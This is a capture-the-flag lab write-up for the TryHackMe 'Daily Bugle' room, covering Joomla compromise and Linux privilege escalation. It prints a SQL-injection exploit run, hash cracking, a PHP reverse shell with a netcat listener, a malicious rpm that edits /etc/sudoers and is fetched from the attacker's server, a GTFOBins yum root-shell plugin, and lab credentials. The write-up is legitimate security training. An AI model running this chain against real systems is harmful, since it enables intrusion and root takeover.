Daily Bugle

Room Link: https://tryhackme.com/room/dailybugle

Deploy

Access the web server, who robbed the bank?

Initial Shell

nmap -A 10.10.116.159

Python Script

git clone https://github.com/stefanlucas/Exploit-Joomla.git 
cd Exploit-Joomla/ 
python3 joomblah.py http://10.10.116.159
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
  -  Extracting sessions from fb9j5_session

Cracking the hash

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

We can now login to Joomla with the credentials we have found

Username: jonah
Password: spiderman123

Reverse Shell

All I did was follow this tutorial to get a reverse shell.

Tutorial: https://www.hackingarticles.in/joomla-reverse-shell/

Kali

nc -lvp 1234

Browser

Used this PHP reverse shell, just needed to change the IP to my own.

PHP Reverse Shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Option #1 - Create malicious rpm file

Found a password in the configuration file. The password worked for the user jjameson which was found in the home directory.

ssh jjameson@10.10.116.159
Password: nv5uz9r3ZEDzVjNu

jjamerson is able to run yum with no password as sudo

sudo -l

Kali 

echo 'echo "jjameson ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > hack.sh 
git clone https://github.com/jordansissel/fpm.git 
cd fpm/bin/ 
./fpm -n root -s dir -t rpm -a all --before-install /root/hack.sh . 
python2 -m SimpleHTTPServer 81

Our fpm file is now created

Victim 

cd /tmp/ 
wget http://10.10.160.125:81/root-1.0-1.noarch.rpm 
sudo yum localinstall root-1.0-1.noarch.rpm 
sudo -i

Option #2 - Spawn interactive root shell by loading a custom plugin

Exploit Link: https://gtfobins.github.io/gtfobins/yum/

Just had to copy paste from gtfobins and it worked right away

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

PreviousSkynetNextOverpass 2 - Hacked

Last updated